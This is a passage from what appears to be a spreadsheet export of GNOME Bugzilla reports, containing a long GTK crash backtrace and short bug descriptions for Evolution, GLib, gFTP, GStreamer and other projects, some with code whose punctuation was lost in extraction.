   from /usr/lib/libgtk-x11-2.0.so.0
#176 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#177 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#178 0x409cbeee in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
#179 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#180 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#181 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#182 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
#183 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
#184 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#185 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#186 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#187 0x405edfe8 in gtk_box_pack_end_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
#188 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#189 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
#190 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#191 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#192 0x409cbeee in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
#193 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#194 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#195 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#196 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
#197 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
#198 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#199 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#200 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#201 0x405e92d4 in gtk_bin_get_type () from
/usr/lib/libgtk-x11-2.0.so.0
#202 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
#203 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
#204 0x40752794 in gtk_window_group_new () from
/usr/lib/libgtk-x11-2.0.so.0
#205 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#206 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
#207 0x409cbeee in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
#208 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
#209 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
#210 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
#211 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
#212 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
#213 0x4075270a in gtk_window_group_new () from
/usr/lib/libgtk-x11-2.0.so.0
#214 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
#215 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#216 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
#217 0x080683c8 in preferences_dialog_destroy ()
#218 0x40107b89 in eel_debug_shut_down () from /usr/lib/libeel-2.so.2
#219 0x080676d8 in main ()
#220 0x40bc68b1 in __libc_start_main () from /lib/libc.so.6
Thread 4 (Thread 2051 (LWP 12249)):
#0  0x40bd9cb9 in sigsuspend () from /lib/libc.so.6
No locals.
#1  0x40a0aeb9 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40a06f32 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40395f90 in thread_entry () from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#4  0x40a0816c in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 1026 (LWP 12248)):
#0  0x40bd9cb9 in sigsuspend () from /lib/libc.so.6
No locals.
#1  0x40a0aeb9 in __pthread_wait_for_restart_signal ()
   from /lib/libpthread.so.0
No symbol table info available.
#2  0x40a06f32 in pthread_cond_wait () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40395f90 in thread_entry () from /usr/lib/libgnomevfs-2.so.0
No symbol table info available.
#4  0x40a0816c in pthread_start_thread () from /lib/libpthread.so.0
No symbol table info available.
Thread 2 (Thread 2049 (LWP 12247)):
#0  0x40ca2833 in poll () from /lib/libc.so.6
No locals.
#1  0x40a07e60 in __pthread_manager () from /lib/libpthread.so.0
No symbol table info available.
Thread 1 (Thread 1024 (LWP 12246)):
#0  0x40c72449 in __wait4 () at __wait4:-1
No locals.
#1  0x40cfbb18 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40a0dc26 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x4020b963 in gnome_scores_new () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#4  0x40a0b6f4 in pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  
No locals.
#6  0x40a4e152 in g_strdup () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#7  0x409f0859 in value_collect_string () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#8  0x409deaee in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#9  0x409def3c in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#10 0x0807b972 in theme_selector_changed_callback ()
No symbol table info available.
#11 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#12 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#13 0x409e0444 in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0x409def3c in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0x401268bf in eel_image_chooser_selection_changed ()
   from /usr/lib/libeel-2.so.2
No symbol table info available.
#17 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#19 0x409e0444 in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#20 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#21 0x409df6da in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#22 0x40728406 in gtk_tree_store_clear () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0x409e1b6c in g_cclosure_marshal_VOID__BOXED ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#24 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#25 0x409e0444 in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#26 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#27 0x409df6da in g_signal_emit_by_name () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#28 0x40712829 in gtk_tree_model_row_deleted ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#29 0x4066ade9 in gtk_list_store_remove () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#30 0x4066c656 in gtk_list_store_clear () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#31 0x401265cd in eel_image_chooser_clear () from
/usr/lib/libeel-2.so.2
No symbol table info available.
#32 0x40126b18 in eel_image_chooser_destroy () from
/usr/lib/libeel-2.so.2
No symbol table info available.
#33 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#34 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#35 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#36 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#37 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#38 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#39 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#40 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#41 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#42 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#43 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#44 0x405e92d4 in gtk_bin_get_type () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#45 0x406a4e40 in gtk_scrolled_window_get_shadow_type ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#46 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#47 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#48 0x406a4af7 in gtk_scrolled_window_get_shadow_type ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#49 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#50 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#51 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#52 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#53 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#54 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#55 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#56 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#57 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#58 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#59 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#60 0x405edfe8 in gtk_box_pack_end_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#61 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#62 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#63 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#64 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#65 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#66 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#67 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#68 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#69 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#70 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#71 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#72 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#73 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#74 0x405edfe8 in gtk_box_pack_end_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#75 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#76 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#77 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#78 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#79 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#80 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#81 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#82 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#83 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#84 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#85 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#86 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#87 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#88 0x405edfe8 in gtk_box_pack_end_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#89 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#90 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#91 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#92 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#93 0x409cbeee in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#94 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#95 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#96 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#97 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#98 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#99 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#100 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#101 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#102 0x405edfe8 in gtk_box_pack_end_defaults ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#103 0x40617c63 in gtk_container_foreach () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#104 0x40619af0 in gtk_container_set_reallocate_redraws ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#105 0x409e1236 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#106 0x409cc3c3 in g_type_class_meta_marshal ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#107 0x409cbeee in g_closure_invoke () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#108 0x409e0e5b in signal_emit_unlocked_R () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#109 0x409dec81 in g_signal_emit_valist () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#110 0x406ab780 in gtk_signal_emit () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#111 0x40688ce2 in gtk_object_remove_no_notify_by_id ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#112 0x40749f9c in gtk_requisition_free () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#113 0x409cd7c4 in g_object_run_dispose () from
/usr/lib/libgobject-2.0.so.0
No symbol table info available.
#114 0x406879f3 in gtk_object_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#115 0x40740dcf in gtk_widget_destroy () from
/usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#116 0x4064358b in gtk_frame_get_label_align ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#117 0x4</t>
  </si>
  <si>
    <t>v.merkatz</t>
  </si>
  <si>
    <t>GAL-200347</t>
  </si>
  <si>
    <t>Deal with editing when sorting changes</t>
  </si>
  <si>
    <t>We should probably just drop all editing when sorting or grouping changes.</t>
  </si>
  <si>
    <t>clahey</t>
  </si>
  <si>
    <t>EVOLUTION-200525</t>
  </si>
  <si>
    <t>manage multiple calendars</t>
  </si>
  <si>
    <t>From: Keelyn Collins 
OK so I know I may have mentioned this before but to put it in writing I
think administrative persons using Evolution in the workplace would be very
appreciative of the ability to manage multiple calendars from a single
workstation where reminders would be active for all calendars managed. For
example I can set my computer up so that I have more than one calendar
view perhaps one for me and one for Nat but it will only prompt me for
meetings for one of the calendars.</t>
  </si>
  <si>
    <t>GLIB-58226</t>
  </si>
  <si>
    <t>Libname miscalculation for libtool libraries</t>
  </si>
  <si>
    <t>Pasted from gtk-devel for archival this is hurting rather currently:
Date: Thu 26 Jul 2001 17:34:17 -0400 (EDT)
From: Michael Meeks 
To: Owen Taylor 
Cc: gtk-devel-list@gnome.org
Subject: gmodule &amp; libtool.
Hi there
        I have a nice library installed with some type data that I wish to
load in using gmodule: the library is called eg. Bonobo_module. So I do a
g_module_open on the right prefix and Bonobo_module.
        parse_libtool_archive is called and correctly identifies the
library name:
[Bonobo_module.la]:
# The name that we can dlopen(3).
dlname='Everything_module.so.0'
...
        Then the code does:
  name = g_module_build_path (lt_libdir lt_dlname)
        And instantly screws up the dlname by prepending a 'lib' and
appending a '.so' - for no reason I can particularly understand:
static gchar*
_g_module_build_path (const gchar *directory
                      const gchar *module_name)
{
  if (directory &amp;&amp; *directory) {
    if (strncmp (module_name lib 3) == 0)
      return g_strconcat (directory / module_name NULL)
    else
      return g_strconcat (directory /lib module_name .so NULL)
  } else if (strncmp (module_name lib 3) == 0)
    return g_strdup (module_name)
  else
    return g_strconcat (lib module_name .so NULL)
}
        While I can see that perhaps the above feature is useful it turns
a perfectly correct library name from libtool into:
        /path/libEverything_module.so.0.so      instead of:
        /path/Everything_module.so.0
        Is there any chance we could have a
        name = g_strconcat (lt_libdir G_DIR_SEPARATOR_S lt_dlname NULL)
        there instead please ? or am I missing something cunning / complex
about libtool ? - I assume we're just trying to solve a problem twice that
libtool has already solved once for us.
        Regards
                Michael.
... and then:
Date: Sat 28 Jul 2001 06:46:34 -0400 (EDT)
From: Michael Meeks 
To: Owen Taylor 
Cc: gtk-devel-list@gnome.org
Subject: Re: gmodule &amp; libtool.
Hi
        Since no one responded to this I'd like to propose a patch
instead - this makes things work nicely again:
Index: gmodule/ChangeLog
===================================================================
RCS file: /cvs/gnome/glib/gmodule/ChangeLogv
retrieving revision 1.59
diff -u -r1.59 ChangeLog
--- gmodule/ChangeLog   2001/07/20 17:01:30     1.59
+++ gmodule/ChangeLog   2001/07/28 10:43:38
@@ -13 +19 @@
+2001-07-28  Michael Meeks  
+
+       * gmodule.c (parse_libtool_archive): build the library name
+       ourselfs ... so we can load the library specified and not
+       mangle any name not beggining in 'lib'.
+
 2001-07-20  Hans Breuer  
        * makefile.msc.in : reflect glib move
Index: gmodule/gmodule.c
===================================================================
RCS file: /cvs/gnome/glib/gmodule/gmodule.cv
retrieving revision 1.39
diff -u -r1.39 gmodule.c
--- gmodule/gmodule.c   2001/07/11 20:08:49     1.39
+++ gmodule/gmodule.c   2001/07/28 10:43:38
@@ -2657 +2657 @@
       lt_libdir = g_strconcat (dir G_DIR_SEPARATOR_S .libs NULL)
     }
-  name = g_module_build_path (lt_libdir lt_dlname)
+  name = g_strconcat (lt_libdir G_DIR_SEPARATOR_S lt_dlname NULL)
   g_free (lt_dlname)
   g_free (lt_libdir)
        The libtool people spend a lot of time getting the name right -
there should be no need for us to mangle it.
        May I commit ?
                Michael.
but the fix is so trivial I wouldn't mess about with the above ChangeLog
entry etc. etc.</t>
  </si>
  <si>
    <t>GTK+-69513</t>
  </si>
  <si>
    <t>Handle drawing of inconsistent state</t>
  </si>
  <si>
    <t>Currently the default theme has no handling for the 
inconsistent state for GtkCheckButton and
GtkRadioButton. (The paint function is called
with the etched-in shadow type as I recall.)</t>
  </si>
  <si>
    <t>sandmann</t>
  </si>
  <si>
    <t>LASEM-665845</t>
  </si>
  <si>
    <t>Mathml</t>
  </si>
  <si>
    <t>LASEM</t>
  </si>
  <si>
    <t>operator rendering code does not set font weight to normal.</t>
  </si>
  <si>
    <t>lsm_mathml_view_update_layout_for_operator() does not set weight while lsm_mathml_view_update_layout_for_text() does. So an operator is always rendered using the weight of the preceding text.
For example:
r
In the case above  operator becomes bold.
lsm_mathml_view_update_layout_for_operator() should explicitly call pango_font_description_set_weight (font_description PANGO_WEIGHT_NORMAL) .</t>
  </si>
  <si>
    <t>hiroshi-n</t>
  </si>
  <si>
    <t>EVOLUTION-252192</t>
  </si>
  <si>
    <t>marking as junk should move to the next messages</t>
  </si>
  <si>
    <t>when you mark a message as junk it should behave the same way deleting a
message does and move to the next message.</t>
  </si>
  <si>
    <t>GLIB-339105</t>
  </si>
  <si>
    <t>g_key_file_parse_value_as_double</t>
  </si>
  <si>
    <t>This probably needs to check for the empty string.
And someone needs to decide what to do about 1e1111111111 +Inf
and NaN.
Relatedly I am not sure that the equality tests in keyfile-test.c are
required to pass.  Some of the numbers are converted at compile time
and some at run-time.</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-309349</t>
  </si>
  <si>
    <t>Unconfigured devices should not appear disabled</t>
  </si>
  <si>
    <t>Network-admin currently shows unconfigured devices as disabled list items. That
gives the impressions that these items are not accessible.
Network-admin should only gray out the device icon not the text right to it to
show that the item is selectable but not configured.</t>
  </si>
  <si>
    <t>br</t>
  </si>
  <si>
    <t>GFTP-319092</t>
  </si>
  <si>
    <t>Crashes when asked to delete a large remote folder</t>
  </si>
  <si>
    <t>Distribution/Version: RH EL 3
1. I Connect with a server (SSH1 server) -&gt; right click on a folder (a large one
with subfolders sub-subfolders ) -&gt; click delete -&gt; on confirmation dialog
click yes.
2. Connect to the server (SSH1) -&gt; select a remote folder -&gt; press delete -&gt; on
confirmation dialog click yes.
The program Hangs after this but in the remote server all the files in all
folders are deleted but somehow the folders are spared</t>
  </si>
  <si>
    <t>n_arju-lx</t>
  </si>
  <si>
    <t>AT-SPI-116876</t>
  </si>
  <si>
    <t>javabridge</t>
  </si>
  <si>
    <t>AT-SPI</t>
  </si>
  <si>
    <t>JABG fails to start when using GNOME HEAD builds</t>
  </si>
  <si>
    <t>When using GNOME built from HEAD JABG fails to start.
It looks like the strings returned from activation-client has changed.</t>
  </si>
  <si>
    <t>DEVHELP-141260</t>
  </si>
  <si>
    <t>Scrollbars do not honor current theme</t>
  </si>
  <si>
    <t>The scrollbars (when visible) in the right-hand pane do not follow the current
Gtk theme.  Actually they look like the default Mozilla colors.</t>
  </si>
  <si>
    <t>GNOME-TERMINAL-500323</t>
  </si>
  <si>
    <t>[Manual] Screenshots use old theme</t>
  </si>
  <si>
    <t>Documentation 
Section: 2
The screenshots in the manual currently use the old theme.
Correct version:
They should use the clearlooks (2.20) look.
Other information:</t>
  </si>
  <si>
    <t>GFTP-168715</t>
  </si>
  <si>
    <t>Crashes when deleting a remote directory</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Delete a remote directory by rightclicking and then answer Yes.
2. Now click immediately Yes again before the messagebox disappeares and gftp
will crash.
Stack trace:
Other information:
** (gftp-gtk:14464): CRITICAL **: file protocols.c: line 2544 (gftp_swap_socks):
assertion `dest-&gt;protonum == source-&gt;protonum' failed
Killed</t>
  </si>
  <si>
    <t>jukka.hellen</t>
  </si>
  <si>
    <t>GSTREAMER-729124</t>
  </si>
  <si>
    <t>multiqueue: avoid signaling overrun on the first segment</t>
  </si>
  <si>
    <t>See attached patch. Easy to reproduce when switching bitrates with
adaptive streams that use mpegts. The segment has a position of a few seconds
usually and it leads to the multiqueue signaling overrun and making decodebin
expose a group that has only audio/video as the mpegtsdemuxer hasn't exposed
the other pad yet.</t>
  </si>
  <si>
    <t>thiagossantos</t>
  </si>
  <si>
    <t>SOUND-JUICER-121229</t>
  </si>
  <si>
    <t>success dialog pops up relative to number of times I encode something</t>
  </si>
  <si>
    <t>Originally filed at:
 http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=103538
Using 0.5.2 encoding single tracks.
The 'The tracks have been copied successfully' dialog appears once the first
time I encode twice the second time three times the third time...</t>
  </si>
  <si>
    <t>EVOLUTION-247173</t>
  </si>
  <si>
    <t>destroyed GtkWindow passed to gtk_im_context_set_client_window</t>
  </si>
  <si>
    <t>It seems that an already destroyed GdkWindow is passed to
gtk_im_context_set_client_window when evolution exits resulting in a
segfault in the input module.
This only happens when the input module is preloaded (by either LC_ALL or
GTK_IM_MODULE e.g: `GTK_IM_MODULE=im-ja evolution`)
This crash occurs when GDK_IS_WINDOW is called to check if the GdkWindow is
valid that was passed by gtk_im_context_set_client_window.</t>
  </si>
  <si>
    <t>boti</t>
  </si>
  <si>
    <t>MUINE-323197</t>
  </si>
  <si>
    <t>MUINE</t>
  </si>
  <si>
    <t>Danish translation not complete</t>
  </si>
  <si>
    <t>Version details: 0.8.3
Distribution/Version: ubuntu breezy
The danish translation isn't complete and it contains minor spelling errors. I'm
attaching a patch to po/da.po to fix this.</t>
  </si>
  <si>
    <t>muine-maint</t>
  </si>
  <si>
    <t>soren</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE-271644</t>
  </si>
  <si>
    <t>Connector</t>
  </si>
  <si>
    <t>EVOLUTION_EXCHANGE</t>
  </si>
  <si>
    <t>Empty string marked for translation</t>
  </si>
  <si>
    <t>File (current CVS):
#: plugins/exchange-account-setup/exchange-account-setup.c:119</t>
  </si>
  <si>
    <t>rsushma</t>
  </si>
  <si>
    <t>frank</t>
  </si>
  <si>
    <t>GLIB-548988</t>
  </si>
  <si>
    <t>g_file_replace fails on Windows when the target file exists already</t>
  </si>
  <si>
    <t>Closing the output stream given by g_file_replace fails with the error Error renaming temporary file: Permission denied when the target file exists already on Windows.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-54483</t>
  </si>
  <si>
    <t>gweather</t>
  </si>
  <si>
    <t>gweather: in metric mode the pressure is displayed in the wrong unit</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-applets
Version: 1.4.0.1
Severity: normal
&gt;Originator: 	 Christian Marillat
&gt;Organization:
net
&gt;Synopsis:	
&gt;Class:		
&gt;Gnome-Libs-Release: gnome-libs-1.2.13
&gt;Environment:
System: Linux falcon.wanadoo.fr 2.4.4 #1 dim mai 6 16:58:12 CEST 2001 i686 unknown
Architecture: i686
Distribution: Debian Version: testing/unstable
&gt;Description:
Hi
gweather displays the pressure in mmHg which is probably intended as the
metric equivalent of inHg. The SI system specifies hPa as the standard
unit for pressure and this is also the unit that is understood by those
using the metric system (in fact it's currently 768.6 mmHg but that tells
me nothing. If it would read 1022.2 hPa I'd know that it's slightly below
average).
The conversion factor is approximately 1.33 (not 4/3).
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-05-11 06:53 -------
Reassigning to the default owner of the component gnome-applets-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>marillat</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-143993</t>
  </si>
  <si>
    <t>[obsolete] settings-daemon</t>
  </si>
  <si>
    <t>Settings Daemon crash upon launch.</t>
  </si>
  <si>
    <t>Hello
I've been detecting crashes with gnome-settings-daemon when compiling GNOME from
